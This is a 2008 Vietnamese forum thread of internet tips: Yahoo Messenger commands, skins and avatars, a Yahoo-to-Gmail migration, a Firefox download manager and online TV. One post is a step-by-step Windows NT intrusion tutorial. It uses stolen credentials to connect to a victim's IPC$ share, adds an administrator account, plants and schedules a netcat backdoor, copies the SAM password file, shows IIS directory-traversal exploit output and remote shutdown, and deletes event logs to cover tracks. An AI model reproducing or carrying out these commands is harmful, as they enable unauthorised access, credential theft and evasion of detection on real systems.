Các bạn chú ý , nếu mục Profile của nick bạn kiểm tra giống như trên thì tức là nick đó là Nick thật 100%

Còn nếu ở mục

Real Name: có ghi
Location: có ghi
Age: có ghi
Marital Status


Thì nick đó sẽ là Nick ảo bạn ạ .

---------------------bye bye--------------------

--------------------------------------------------------------------------------
avatar
hs6_online
Siêu Nhân Đại Học
Siêu Nhân Đại Học

Nữ
Tổng số bài gửi : 372
Age : 28
+ Nơi ở : ?????
+ Sở thích : đi du lịch,ngồi net xuyên đêm
+ Tính tình : vui vẻ,dể gần
+ Tên thật .... : đừng bận tâm về chuyện này
+ Ước mơ của tớ là .... : lên sao hoả,đi xuyen việt
+ Câu nói ưa thích của tớ .... : ko có gì là ko thể trừ khi chúng ta ko thể
Registration date : 16/08/2008

Xem lý lịch thành viên

Về Đầu Trang Go down

default Re: các thủ thuật về internet nè

Bài gửi by hs6_online on Sat Aug 23, 2008 9:13 am

Hiện nay, hộp thư Gmail với nhiều ưu điểm và tính năng hay nên rất nhiều người đã chuyển từ các hộp thư khác sang dùng hộp thư Gmail. Trong đó, có nhiều bạn đã chuyển từ hộp thư Yahoo! Mail sang Gmail. Sau đây là vài "giải pháp" giúp bạn xử lý việc này để "vẹn cả đôi đường".
Với các hộp thư có chức năng chuyển thư tự động thì khi bạn chuyển từ hộp thư này sang hộp thư khác sẽ không thành vấn đề. Nhưng với Yahoo! Mail thì lại không có chức năng chuyển thư tự động rất hay này. Do đó, khi chuyển từ Yahoo! Mail sang Gmail, bạn có thể áp dụng các cách “thủ công” đơn giản sau đây để giúp mọi người biết được địa chỉ e-mail mới ở hộp thư Gmail của bạn:
Cách 1:
- Bạn xem e-mail mới ở Yahoo! Mail, sau đó bạn qua Gmail hồi âm lại cho người nhận. Dần dần, mọi người sẽ biết được địa chỉ e-mail mới của bạn.
- Khi gửi e-mail cho địa chỉ e-mail mới, bạn dùng Gmail để gửi. Bạn không dùng Yahoo! Mail để gửi e-mail mới nữa.
Cách 2:
- Bạn thiết lập thông báo tự động cho hộp thư Yahoo! Mail. Trong nội dung thông báo tự động này bạn cho biết là bạn đã chuyển sang dùng Gmail, và đề nghị người gửi gửi lại e-mail cho bạn sang hộp thư Gmail.
- Tuy nhiên, với cách này thì bạn nên thỉnh thoảng xem lại hộp thư Yahoo! Mail, bởi vì nhiều khi thông báo tự động do Yahoo! Mail gửi lại cho người gửi sẽ không chú ý đến do tưởng e-mail này giống như các e-mail trả lời tự động khác nên không xem và xoá bỏ. Cho nên, người gửi sẽ không biết mà gửi lại e-mail sang hộp thư Gmail cho bạn.
Cách thiết lập thông báo tự động cho Yahoo! Mail:
- Bạn đăng nhập vào hộp thư Yahoo! Mail. Sau khi đăng nhập thành công, bạn bấm chọn mục “Mail Options”.
- Tiếp theo, bạn bấm chọn mục “General Preferences”, bấm chọn tiếp mục “Vacation Response” để mở ra trang thiết lập hồi âm tự động.
- Bây giờ, bạn nhập vào thời gian bắt đầu và thời gian kết thúc của thông báo này, nhập vào nội dung của thông báo (về việc bạn đã thay đổi địa chỉ e-mail sang Gmail) trong ô “Generic Response”.
- Sau cùng, bạn bấm vào nút “Save Changes” là xong.
avatar
hs6_online
Siêu Nhân Đại Học
Siêu Nhân Đại Học

Nữ
Tổng số bài gửi : 372
Age : 28
+ Nơi ở : ?????
+ Sở thích : đi du lịch,ngồi net xuyên đêm
+ Tính tình : vui vẻ,dể gần
+ Tên thật .... : đừng bận tâm về chuyện này
+ Ước mơ của tớ là .... : lên sao hoả,đi xuyen việt
+ Câu nói ưa thích của tớ .... : ko có gì là ko thể trừ khi chúng ta ko thể
Registration date : 16/08/2008

Xem lý lịch thành viên

Về Đầu Trang Go down

default Re: các thủ thuật về internet nè

Bài gửi by hs6_online on Sat Aug 23, 2008 9:14 am

các tạo chữ ký lửa trong yahoo
Các bạn vào địa chỉ này ::::
flamingtext.com/net-fu/f...aming-logo.html
Các bạn muốn có chữ gì bốc lửa thì đánh vào ô Text String,
Đánh số vào ô Font Size để thay đổi kích cỡ của dòng chữ (mặc định là 35).
Click vào Font để thay đổi font chữ.
Chỉnh màu sắc cho chữ thì bạn bấm vào khung màu, nó sẽ hiện ra một bảng màu cho các bạn chọn.
Đánh dấu kiểm vào Transparent nếu các bạn muốn có nền trong suốt. Nếu không thích lửa màu đỏ như mặc định thì đánh dấu chọn vào hộp Blue-Flame.
Sau khi đã chọn lựa xong, bấm vào Create Logo để nhận được kết quả. Nếu không hợp nhãn có thể bấm Back để quay lại chỉnh sửa tiếp.
Nếu không được bạn click vào "Refresh nhe,click vào đó vài lần là được thôi
Sau đó, bạn save tấm ảnh về máy của mình (Click chuột fải rồi chọn Save picture as...). Rồi upload lên để lấy cái Link , rồi paste vào chữ ký của mình. Thế là đã xong rồi đó. Chúc các bạn vui nhé
avatar
hs6_online
Siêu Nhân Đại Học
Siêu Nhân Đại Học

Nữ
Tổng số bài gửi : 372
Age : 28
+ Nơi ở : ?????
+ Sở thích : đi du lịch,ngồi net xuyên đêm
+ Tính tình : vui vẻ,dể gần
+ Tên thật .... : đừng bận tâm về chuyện này
+ Ước mơ của tớ là .... : lên sao hoả,đi xuyen việt
+ Câu nói ưa thích của tớ .... : ko có gì là ko thể trừ khi chúng ta ko thể
Registration date : 16/08/2008

Xem lý lịch thành viên

Về Đầu Trang Go down

default Re: các thủ thuật về internet nè

Bài gửi by hs6_online on Sat Aug 23, 2008 9:14 am

Các lệnh trong yahoo


Có thể bạn là một chatter ngoại hạng nhưng vẫn chưa biết về cái ni đó :
/join (chat room name) va`o phong chat
/invite [buddys name] (sends invitation request) mời chat
/tell [user] [message] (private messages a friend)" nhắn tin cá nhân (bí mật )
/follow [user] (follows a friend)" theo ( 1 người bạn ) (chả hiểu ý gì ?)
/stopfollow [user] (stop following someone)" ngưng theo
/stopfollow [yourname] (to stop them from following you)" không cho người nào đó theo nữa
/goto [user] đi đến
/away off (to turn your private messages back on)" bật nhắn tin cá nhân lại
/think (type this to think a random thought)" đánh cái này để nghĩ 1 chuyện ngẫu nhiên !
/think [message] (type this to think what you want)" đánh cái này để nghĩ cái gì mà bạn mún
/exit (exits you back to login page)" quay trở ra trang login
/quit (exits you back to login page)" như trên
/ignore

(list everyone who you are ignoring)" danh sách những người mình đang phớt lờ
/ignore add [user] (add someone to your ignoring list)" add tên ai đó vào danh sách ignore ( phớt lờ )
/ignore add all (ignores everything going on)" phớt lờ mọi thứ đanh xảy ra
/ignore remove all (stop you from ignoring everything)" ngưng phớt lờ
/autofollow (list the options for autofollow)" đưa ra danh sách các tùy chọn cho autofollow
/autofollow ask (makes person send a request to follow you)" buộc mọi người phải gửi yêu cầu khi mún theo bạn
/autofollow yes (allow anyone to follow you)" cho phép mọi người theo
/autofollow no (disallow anyone from following you)" ko cho phép người nào theo
/autogoto (list the options for autogoto)" đưa ra danh sách các tùy chọn cho autogoto

/autogoto ask (makes person send a request to goto you)" buộc mọi người phải gửi yêu cầu khi mún goto bạn ( ko bít nên dịch goto này là gì ? đi đến bạn ? )

/buddy add [user] (add someone to your buddy list)" add nick vào list
/buddy list (will list everyone on your buddy list)" đưa ra danh sách các bạn chat trong YM của bạn
/go lobby (exits what ever room your in to lobby)" ra khỏi phòng chát , vào lobby
/go (room) (go to what ever room you wish)"để vào room nào đó ( đánh tên vào )
avatar
hs6_online
Siêu Nhân Đại Học
Siêu Nhân Đại Học

Nữ
Tổng số bài gửi : 372
Age : 28
+ Nơi ở : ?????
+ Sở thích : đi du lịch,ngồi net xuyên đêm
+ Tính tình : vui vẻ,dể gần
+ Tên thật .... : đừng bận tâm về chuyện này
+ Ước mơ của tớ là .... : lên sao hoả,đi xuyen việt
+ Câu nói ưa thích của tớ .... : ko có gì là ko thể trừ khi chúng ta ko thể
Registration date : 16/08/2008

Xem lý lịch thành viên

Về Đầu Trang Go down

default Re: các thủ thuật về internet nè

Bài gửi by hs6_online on Sat Aug 23, 2008 9:15 am

Tạo nền cho List nick của bạn trong Yahoo Mess


/ Tạo ảnh nền từ Skin có sẵn :
Bạn vào trang này nha : http://www.mxskinz.com/yahooskinz.htm

Sau đó tìm tòi một cái Skin nào đó mà download về nha
Bạn nhấn vào chữ Download và Down nó về đâu cũng được miễn là bạn phải nhớ nó nằm ở đâu sau còn tìm mà giải nén .

Sau khi Down về bạn phải tiến hành giải nén cho nó
Bạn có Winzip thì mới giải nén nó nha .

Sau khi giải nén nó bạn có hình bên chứa các file đã giải nén .Bạn tiến hành tạo cho nó một thư mục nha bằng cách :

+ Bạn chọn Extract và bạn tiến hành chọn đường dẫn cho thư mục đó ( nó có tên mặc nhiên là ANGEL)

+ Trong Folders/drives bạn chọn đường dẫn như sau :

- [C:] --> Program files --> Yahoo!--> Messenger --> skins

+Bạn kick vào Extract là xong

Thế là trong thư mục skins trên có một thư mục con là ANGEL ( Bạn có thể kiểm tra nó có những file gì)

Thế là ổn rồi đó và vì sao phải làm thế thì tôi sẽ giải thích ngay đây :

+ Bạn à vì thế nào trong thư mục skins của Yahoo thì nó có chức năng là tạo các giao diện khác nhau cho trang chur hay là màn hình chat của Yahoo Mess . Vì thế khi bạn có một thư mục tạo ảnh nền nào đó có sẵn trên mạng hay bạn tự làm và bạn cho vào trong thư mục skins của Yahoo! nó sẽ lập tức dùng được ngay . Và bạn có thể tìm thấy cách bật tắt nó trong đường dẫn sau của trang chủ YM : Login --> Preferences --> Appearance

Trong Main Messenger Window trong mục Current Theme: Bạn hãy chọn nó như hình bên sẽ xuất hiện một tên là ANGEL để bạn chọn nó.

Và sau khi có nó thì bạn đã thành công rồi đó .
Bạn muốn dùng ANGEL thì chọn nó và tiếp tục chọn Apply và OK
avatar
hs6_online
Siêu Nhân Đại Học
Siêu Nhân Đại Học

Nữ
Tổng số bài gửi : 372
Age : 28
+ Nơi ở : ?????
+ Sở thích : đi du lịch,ngồi net xuyên đêm
+ Tính tình : vui vẻ,dể gần
+ Tên thật .... : đừng bận tâm về chuyện này
+ Ước mơ của tớ là .... : lên sao hoả,đi xuyen việt
+ Câu nói ưa thích của tớ .... : ko có gì là ko thể trừ khi chúng ta ko thể
Registration date : 16/08/2008

Xem lý lịch thành viên

Về Đầu Trang Go down

default Re: các thủ thuật về internet nè

Bài gửi by hs6_online on Sat Aug 23, 2008 9:15 am

Sử dụng mãi giao diện của YM đôi khi cũng khiến bạn thấy chán ngán, không còn thú vị. Vậy tại sao bạn không trang hoàng cho chương trình chat của mình một giao diện tuyệt đẹp "no **ng hàng" thật hoành tráng để có thể hãnh diện khoe với bạn bè. Có rất nhìu Skin nhưng kenshin chỉ đưa ra một số Skin tiu bỉu thui (các bạn tự mò lấy nhá). Các bạn sau khi Install, bạn vào Messenger --> Preferences --> Appearance --> change Skin --> chọn skin ...

1. Coheed And Cambria: Tác giả của nó cho rằng những vòng cuộn xoắn trên giao diện này là biểu tượng của vòng luân hồi (nghe ghê nhỉ :ermm: ). Đây là skin rất phù hợp cho những người thích nghệ thuật trừu tượng (ken đang xài skin này :wavetowel ). Bạn vào đây để tải nhá: www.modernmorph.com/downloads/redirect.php?dlid=260

2. Hannelore: Toàn bộ YM sẽ được phủ lên 1 lớp nhung đỏ nổi bật, các nút chức năng sẽ được thêm các bóng mờ lung linh, và mọi thứ sẽ nổi bật trên Desktop của bạn (trông hoành tráng nhể :59: )
www.modernmorph.com/downloads/redirect.php?dlid=97

3. Patriots: Thay các biểu tượng YM bằng các trái bóng đủ màu sắc, và phủ lên màn hình 1 màu xanh đỏ đặc trưng của quân phục Pháp thời Napoleon (dành cho ai iu ổng Very Happy)
www.modernmorph.com/downloads/redirect.php?dlid=18

4. Toe Bee's Dolphins: Nếu là người iu thích cá heo và thế giới đại dương thì bạn không nên bỏ wa skin này
www.modernmorph.com/downloads/redirect.php?dlid=7

5. Fairy: Những thiên thần nhỏ bé hiện trên cửa sổ YM sẽ đem lại cho bạn cảm giác thư thái như đang lạc vào thế giới thần tiên. Tính năng của Skin này là những nik ko online sẽ bị ẩn và hiện lên những ai đang online cho dù người đó có Invisible đi nữa (tin đc ko nhỉ 👏 )
www.modernmorph.com/downloads/redirect.php?dlid=10

6. Dragon BallZ: Nếu bạn từng iu thích bộ truyện 7 viên ngọc rồng thì không nên pỏ sót Skin này đc. Bạn sẽ gặp lại các char như SonGoKu, CaDic, Pocollo.... <--- máu nhể :gun_rifle Smile
www.modernmorph.com/downloads/redirect.php?dlid=6

7. Skull: SKin này sẽ đưa đám hải tặc trong bộ truyện nổi tiếng của Maika vào trong YM. Bạn sẽ bất ngờ với biểu tượng đặc trưng của :chris: khi chát
www.modernmorph.com/downloads/redirect.php?dlid=9

Còn nhìu Skin, các bạn tự mò đi nhá http://www.modernmorph.com/downloads/ <--- vào đây nè
avatar
hs6_online
Siêu Nhân Đại Học
Siêu Nhân Đại Học

Nữ
Tổng số bài gửi : 372
Age : 28
+ Nơi ở : ?????
+ Sở thích : đi du lịch,ngồi net xuyên đêm
+ Tính tình : vui vẻ,dể gần
+ Tên thật .... : đừng bận tâm về chuyện này
+ Ước mơ của tớ là .... : lên sao hoả,đi xuyen việt
+ Câu nói ưa thích của tớ .... : ko có gì là ko thể trừ khi chúng ta ko thể
Registration date : 16/08/2008

Xem lý lịch thành viên

Về Đầu Trang Go down

default Re: các thủ thuật về internet nè

Bài gửi by hs6_online on Sat Aug 23, 2008 9:16 am

Dịch vụ trao đổi tin nhắn Yahoo Messenger rất được giới trẻ ưa chuộng do ngày càng được tích hợp nhiều tính năng hay. Một trong những tính năng thú vị là bạn có thể đưa hình của mình lên ngay cửa sổ đang chat hoặc tạo ra một hình đại diện theo sáng tạo của riêng bạn thông qua công cụ Yahoo Avatars.

Trên một cửa sổ đang chat đang mở bạn click vào biểu tượng “Change display image”

Tiếp theo là bạn chọn vào phần “Share my avatar”

Nếu tài khoản của bạn chưa tạo Avatar bạn sẽ thấy xuất hiện một hình “Create your own avatar”, bạn hãy click chuột lên hình này. Lúc này một trang web sẽ mở ra và vào ngay trang chủ của tiện ích Yahoo Avatar theo tài khoản của bạn.
http://www.trithuc.com/tapchibit/thuthuat/104-tt-01.jpg
http://www.trithuc.com/tapchibit/thuthuat/104-tt-02.jpg
Bạn hãy quan sát phía bên phải, và đánh dấu chọn vào phần Male nếu bạn là phái nam, hoặc Female nếu bạn là nữ. Sau đó click chọn nút “Create my Avatar”
Trang đầu tiên mà bạn thấy sẽ cho phép tạo Avatar qua 3 bước đơn giản.
Bước 1 là chọn bộ quần áo cho nhân vật, hoặc thêm vào dụng cụ, con vật phù hợp với cá tính của mình.
Bước 2 là nhấn vào nút “Save Changes” để kết thúc là lưu lại nhân vật Avatar.
Sau bước 2 này bạn sẽ thấy trên cửa sổ “Display Image” ở máy tính bạn sẽ xuất hiện nhân vật mà bạn vừa chọn.
Bước 3 là cách thể hiện nhân vật Avatar này khi chat. Để nhân vật này hiển thị khi bạn chat với mọi người, hãy đặt dấu chọn ở phần “Use this selection for everyone”. Cuối cùng nhấn vào nút OK.
Thế là nhân vật Avatar của bạn sẽ xuất hiện trên cửa sổ này mỗi khi bạn chat.
Tuy nhiên có lẽ bạn muốn nhiều lựa chọn hơn cho nhân vật của mình để thể hiện đúng phong cách mình cần. Bây giờ bạn hãy quay lại trang web Yahoo Avatars.
http://www.trithuc.com/tapchibit/thuthuat/104-tt-03.jpg
Bạn sẽ thấy có một số thẻ:
Thẻ Apparel cho phép bạn chọn lựa về trang phục,
Thẻ Appearance cho bạn thay đổi về màu da, gương mặt, kiểu tóc
Thẻ Extras cho bạn thêm vào đồ trang sức như mũ, khăn choàng cổ, dụng cụ thể thao, kính mát v.v.
Thẻ Backgrounds cho bạn chọn phong cảnh ở phía sau bạn.
Nếu bạn muốn phóng to, thu nhỏ nhân vật Avatar, hãy nhấn nút +, -.
Và cuối cùng đừng quên nhấn nút “Save Changes” để áp dụng thay đổi của bạn cho nhân vật Avatar
http://www.trithuc.com/tapchibit/thuthuat/104-tt-04.jpg
avatar
hs6_online
Siêu Nhân Đại Học
Siêu Nhân Đại Học

Nữ
Tổng số bài gửi : 372
Age : 28
+ Nơi ở : ?????
+ Sở thích : đi du lịch,ngồi net xuyên đêm
+ Tính tình : vui vẻ,dể gần
+ Tên thật .... : đừng bận tâm về chuyện này
+ Ước mơ của tớ là .... : lên sao hoả,đi xuyen việt
+ Câu nói ưa thích của tớ .... : ko có gì là ko thể trừ khi chúng ta ko thể
Registration date : 16/08/2008

Xem lý lịch thành viên

Về Đầu Trang Go down

default Re: các thủ thuật về internet nè

Bài gửi by hs6_online on Sat Aug 23, 2008 9:17 am

xâm nhập máy tính


Phần 1 : Net

chỉ cần bạn có được User và Passwords của một IP nào trên Net...thế là bồ có thể kết nói một IPC$ rửng rồi đấy....

bây giờ tớ xin ví dụ là bạn có được User la hbx và passwords : 123456...IP : 127.0.0.1

cậu hãy mở trình Ms dos và gõ vào lệnh sau :

Net use \\127.0.0.1\ipc$ "123456" /user:"hbx" đẩ kết nồi một IPC$ rửng với máy victtim

nhưng thao tác tiếp theo..bạn nhất thiết phải login xong mới có thể sử dụng

-------------------------

bây giờ chúng ta nói tiếp làm thế nào để tạo một user mới nghe...

chúng ta cộng thệm môt user mới là heibai và password lovechina

Net user heibai lovechina / add

nếu bạn thành công..thì có thể cộng user này vào nhom Adminstrator

Net Localgroup Adminstrator heibai / add

-------------------------

trong phần này tớ hướng dẫn tạo một ổ đ** Ảo trên computer

Net use z: \\127.0.0.1\C$ ( hoặc là IPC$ )

Z là của mình...còn C$ là của Victim


Phần 2 : AT

thông thường thì khi độp nhập vào máy tính..chúng ta sẻ tặng quà lưu niệm cho victim trước khi rút lui,....vậy khi copy trojan lên máy rồi...làm thế nào dể khới động nó đây ?

chúng ta phải dùng đến lệnh AT thôi.....

đầu tiên...chúng ta cần biết thời gian của đối phương

Net time \\127.0.0.1

bây giờ thì nó sẽ phản hồi thời gian của victim...vd : 12:0 ..
tiếp theo..chúng ta cần tạo môt homework ID = 1

AT \\127.0.0.1 12:3 nc.exe

ở đây giả thiết là tui có con trojan la Nc.exe và đã được copy lên máy victim rồi

* giới thiệu chút it về NC...NC là từ viết tắc của NETCAT....nó là một telnet server với port 99

đợi đến 12:3 là nó sẽ tự chạy trên máy nạn nhân và chúng ta có thể connected đến port 99..thế là xong phần lưu bút


phần 3 : Telnet

đây là một lệnh rất cần thiết khi xâm nhập máy tính...nó có thể kết nối vớ máy tính khắc từ xa..nhưng thường thi phải có I D & PW..nhưng nếu máy đã Ăn Đạn rồi thì bạn chỉ cần connected đến port 99 là ok

Telnet 127.0.0.1 99

thế là bồ đã kết nối đến port 99 và có thể thực hiện tất cả các lệnh...


Phần 4 : Copy

bây giờ chúng ta nói tiêp...làm thế nào để copy files trên máy mình lên máy victim và làm ngược lại....nhưng bạn phải có kết nối IPC$ cái đã....

chúng ta copy files index trên ổ C của mình lên ổ C của 127.0.0.1

Copy Index.html \\127.0.0.1\C$\index.html

nếu bạn copy lên folder winNt

Copy index.html \\127.0.0.1\admin$\index.html

muốn copy files trên máy victm thì bạn gõ vào :

Copy \\127.0.0.1\Admin$\repair\sam._c:\


phần 5 : Set

nếu bạn muốn hack một website......tất nhiến là phải mở port 80..nếu không thì cậu hack cho ai xem ?

đã tới lúc dùng lệnh Set rồi

sau đây là kết quả mà tớ tìm thấy......chúng ta phân tích nghe....chủ yếu là muốn biêt homepage nó ở đâu thôi.....

COMPUTERNAME=PENTIUMII
ComSpec=D:\WINNT\system32\cmd.exe
CONTENT_LENGTH=0
GATEWAY_INTERFACE=CGI/1.1
HTTP_ACCEPT=*/*
HTTP_ACCEPT_LANGUAGE=zh-cn
HTTP_CONNECTION=Keep-Alive
HTTP_HOST= DAY LA SO IP CUA TUI..NHUNG TUI DEL ROIHTTP_ACCEPT_ENCODING=gzip, deflate
HTTP_USER_AGENT=Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)
NUMBER_OF_PROCESSORS=1
Os2LibPath=D:\WINNT\system32\os2\dll;
OS=Windows_NT
Path=D:\WINNT\system32;D:\WINNT
PATHEXT=.COM;.EXE;.BAT;.CMD
PATH_TRANSLATED=E:\vlroot DAY LA URL CUA HOMEPAGE, CHI CAN NHIN SAU DONG PATH_TRANSLATED= LA BIET NO O DAU 。O DAY LA E:\vlroot PROCESSOR_ARCHITECTURE=x86
PROCESSOR_IDENTIFIER=x86 Family 6 Model 3 Stepping 3, GenuineIntel
PROCESSOR_LEVEL=6
PROCESSOR_REVISION=0303
PROMPT=$P$G
QUERY_STRING=/c+set
REMOTE_ADDR=XX.XX.XX.XX
REMOTE_HOST=XX.XX.XX.XX
REQUEST_METHOD=GET
script_NAME=/scripts/..%2f../winnt/system32/cmd.exe
SERVER_NAME=XX.XX.XX.XX
SERVER_PORT=80
SERVER_PORT_SECURE=0
SERVER_PROTOCOL=HTTP/1.1
SERVER_SOFTWARE=Microsoft-IIS/3.0
SystemDrive=D:
SystemRoot=D:\WINNT
TZ=GMT-9
USERPROFILE=D:\WINNT\Profiles\Default User
windir=D:\WINNT

đây là cách khá ngu..nhưng chỉ có cách này mới 100% biết đuợc homepage tên gì..ở ảâ ? khi cậu Dir ..chắc chắn là sẽ View được rất nhiều files đấy`.....

phần 6 : Nbtstat

nếu cậu Scan đuợc một máy sữ dụng Winnt...open port 135-139...thế thì bồ phải dùng lệnh này để biết thêm user thôi...

* tiện thể xin nói luôn...đây là netbios....sau khi có user rồi bạn có thể đoán mò password..nếu không thi Cracking luôn đi

Nbtstat - A XXX.XXX.XXX.XXX

sau đây là kết quả tớ scan được.....

NetBIOS Remote Machine Name Table

Name Type Status
---------------------------------------------
Registered Registered Registered Registered Registered Registered Registered Reg
istered Registered Registered Registered
MAC Address = 00-E0-29-14-35-BA
PENTIUMII <00> UNIQUE
PENTIUMII <20> UNIQUE
ORAHOTOWN <00> GROUP
ORAHOTOWN <1C> GROUP
ORAHOTOWN <1B> UNIQUE
PENTIUMII <03> UNIQUE
INet~Services <1C> GROUP
IS~PENTIUMII...<00> UNIQUE
ORAHOTOWN <1E> GROUP
ORAHOTOWN <1D> UNIQUE
..__MSBROWSE__.<01> GROUP

kết quả cho biết User là PENTIUMII。


phần 7 : Shutdown

nhìn lệnh thôi cũng đủ biết rồi phải hông ? đây là lệnh shutdown server Winnt

Shutdown \\127.0.0.1 t:20

20 giây sau...Winnt sẽ tự khời động lại.......hi vọng các bạn suy nghỉ kỷ trước khi dùng lệnh này....vì nó sẽ làm tổn thất rất nặng cho victim...hãy làm tay hacker có đạo đức


phần 8 : Dir....

lệnh này không có gì để nói hết..chỉ dùng để view thôi.................


phần 9 : Del

lệnh này giống như xoá nhật ký vậy đó.....khi chúng ta xâm nhập máy tình...trên hệ thống sẽ lưu lại thông tin của chúng ta..vì thế..nên del nó đi...chư muốn bị tóm cổ hả ?

sau đây là những files nhật ký của Winnt

del C:\winnt\system32\logfiles\*.*
del C:\winnt\ssytem32\config\*.evt
del C:\winnt\system32\dtclog\*.*
del C:\winnt\system32\*.log
del C:\winnt\system32\*.txt
del C:\winnt\*.txt
del C:\winnt\*.log
avatar
hs6_online
Siêu Nhân Đại Học
Siêu Nhân Đại Học

Nữ
Tổng số bài gửi : 372
Age : 28
+ Nơi ở : ?????
+ Sở thích : đi du lịch,ngồi net xuyên đêm
+ Tính tình : vui vẻ,dể gần
+ Tên thật .... : đừng bận tâm về chuyện này
+ Ước mơ của tớ là .... : lên sao hoả,đi xuyen việt
+ Câu nói ưa thích của tớ .... : ko có gì là ko thể trừ khi chúng ta ko thể
Registration date : 16/08/2008

Xem lý lịch thành viên

Về Đầu Trang Go down

default Re: các thủ thuật về internet nè

Bài gửi by hs6_online on Sat Aug 23, 2008 9:18 am

Tăng tốc độ download lên 600%


http://www2.thanhnien.com.vn/Uploaded/huynhthang/2006/Thu%202/044/9pa.jpg

Trên đấu trường trình duyệt web hiện nay, khó có đối thủ nào bì kịp Mozilla Firefox về tốc độ và sức mạnh bảo mật, tuy nhiên điểm yếu cố hữu mà bạn có thể dễ dàng nhận ra ở Mozilla Firefox chính là một trình quản lý download được thiết kế quá chân phương. Nhằm khắc phục mặt khuyết này, nhóm dTa đã tích hợp vào Mozilla Firefox một trình quản lý download siêu cấp có dung lượng siêu nhỏ (395 KB), đó là DownThemAll!.


DownThemAll! sẽ là một sự bổ sung hoàn hảo cho Mozilla Firefox với bộ lọc link thông minh, khả năng download cùng lúc nhiều file khác nhau trong trang web của Mozilla Firefox, hỗ trợ tính năng resume cho phép dừng và phục hồi tiến trình download bất cứ khi nào bạn muốn, nhưng tuyệt vời hơn hết là nó có thể giúp tăng tốc độ download file của Mozilla Firefox lên đến 600% (với những máy sử dụng kết nối băng thông rộng). Có cần sử dụng thêm một trình quản lý download của hãng thứ ba khi bên cạnh Mozilla Firefox đã có DownThemAll!?

Firefox có thể download ở đâu ?


http://download.google.com
( http://pagead2.googlesyndication.com/pagead/iclk?sa=l&num=0&adurl=http://services.google.com/toolbar/firefox%3Fai%3DBE9szE2vwQ_rrOo78Leu1qK8C44CgDduDst EBxY23AQAQASCW4bkDQJAVSKI5UIPj0QKYAaqOBqABtZXI_QPI AQLgAQOAAgGVAhN-Cwo&ai=B9VQwE2vwQ_rrOo78Leu1qK8C44CgDduDstEBxY23AQAQAS CW4bkDQJAVSKI5UNX7qKL9_____wGYAaqOBqABtZXI_QPIAQLg AQOAAgGVAhN-Cwo)

Sau đó click vào "Download FireFox with Google Toolbar"

Bạn tải về miễn phí phiên bản mới nhất DownThemAll! 0.9.8.7 tại địa chỉ sau: www.zshare.net/download/dta-xpi.html ( http://www.zshare.net/download/dta-xpi.html)

Sau khi tải xuống, bạn copy file dta.xpi vào thư mục Program Files\Mozilla Firefox\extensions. Khởi động lại Mozilla Firefox và trong hộp thoại xuất hiện, bấm nút Install Now để hoàn tất việc cài đặt. Từ giao diện chính của Mozilla Firefox, bạn vào menu Tools > DownThemAll > Preferences để mở cửa sổ thiết lập thông số hoạt động cho DownThemAll!. Những tùy chọn tại các tab Renaming, Filter, Aspect và Privacy, bạn có thể giữ nguyên như thông số khuyến cáo; riêng với tab Main, bạn cần thay đổi một vài thông số quan trọng tại các mục dưới đây:

- If a file name already exists: 4 tùy chọn được đưa ra khi bạn tải trùng file, bao gồm: Rename (đổi tên file tải sau), Overwrite (đè lên file đã tải), Skip (bỏ qua không tải) và Ask (hỏi ý kiến của bạn).

- Simultaneous downloads > Start simultaneously a maximum of: xác định số lượng tác vụ cho phép download cùng lúc với DownThemAll! (mặc định là 7).

- Multipart settings > Maximum number of chunks per download: lựa chọn khả năng chia nhỏ một tập tin khi download với DownThemAll! (mặc định là 5).

- Time Out: xác định khoảng thời gian chờ khi DownThemAll! chưa kết nối thành công với server chứa file cần download (mặc định là 5 phút).

Cách sử dụng khá đơn giản. Để download một file nào đó với DownThemAll!, bạn bấm chuột vào link chứa file. Trong hộp thoại xuất hiện, đánh dấu ở mục DownThemAll! rồi bấm OK. Trong hộp thoại Browse For Folder, bạn chọn thư mục lưu file rồi bấm OK. Ngay sau đó, hộp thoại quản lý download của DownThemAll! sẽ xuất hiện và tự động thực hiện download file. Ở những lần download sau, trong hộp thoại xuất hiện sau khi bạn bấm chuột vào link chứa file sẽ có thêm tùy chọn Turbo-DTA! với nơi lưu file là thư mục mà bạn đã chọn ở lần download đầu tiên.

Khi muốn download cùng lúc nhiều file khác nhau, bạn bấm phải chuột vào một nơi bất kỳ trong trang web và chọn thẻ DownloadThemAll!. Trong hộp thoại xuất hiện, tại mục Save files in, bạn bấm nút Browse và chọn thư mục lưu file. Tại mục Filters, bạn lọc ra những định dạng file sẽ download bằng cách đánh dấu ở 4 tùy chọn là: Archives (file nén), Video (file video), Images (file hình ảnh) hoặc All files (tất cả file). Sau cùng, lựa chọn những link muốn download trong danh sách URL và bấm nút Start download!. Nếu chỉ muốn download những file hình ảnh có trong trang web, bạn bấm vào thẻ Pictures phía trên, đánh dấu ở những link chứa hình ảnh và bấm nút Start download! thì quá trình download sẽ diễn ra nhanh hơn.
avatar
hs6_online
Siêu Nhân Đại Học
Siêu Nhân Đại Học

Nữ
Tổng số bài gửi : 372
Age : 28
+ Nơi ở : ?????
+ Sở thích : đi du lịch,ngồi net xuyên đêm
+ Tính tình : vui vẻ,dể gần
+ Tên thật .... : đừng bận tâm về chuyện này
+ Ước mơ của tớ là .... : lên sao hoả,đi xuyen việt
+ Câu nói ưa thích của tớ .... : ko có gì là ko thể trừ khi chúng ta ko thể
Registration date : 16/08/2008

Xem lý lịch thành viên

Về Đầu Trang Go down

default Re: các thủ thuật về internet nè

Bài gửi by hs6_online on Sat Aug 23, 2008 9:19 am

Xem truyền hình khắp thế giới qua Internet


Không đòi hỏi phải có card TV, chỉ cần máy tính kết nối Internet là bạn đã có thể chạy chương trình xem truyền hình trực tuyến ChrisTV online. Chương trình sẽ đáp ứng nhu cầu xem tất cả các kênh truyền hình hay các chương trình phát sóng âm nhạc từ khắp mọi nơi trên thế giới qua Internet.


ChrisTV Online sẽ mang cả thế giới truyền hình đến cho màn ảnh của bạn và bạn sẽ nhận được đầy đủ dữ liệu từ hơn 800 kênh truyền hình và 600 trạm phát sóng trên khắp quả địa cầu từ hơn 100 đất nước. Thể loại của các kênh truyền hình và các sóng âm nhạc trên ChrisTV Online rất phong phú, bạn có thể tìm thấy từ những bản tin tức, âm nhạc, thể thao, giáo dục, tôn giáo tới các kênh giải trí.Với phiên bản 2.00 bạn sẽ khám phá được những tính năng ưu việt khi sử dụng ChrisTV Online so với các chương trình xem truyền hình khác cũng như cách thức xem truyền hình truyền thống phức tạp:- Xem đươc hơn 100 kênh và các kênh tin tức truyền hình từ khắp nơi trên thế giới.

- Xem được hơn 200 kênh âm nhạc và tất cả các kênh tin tức.

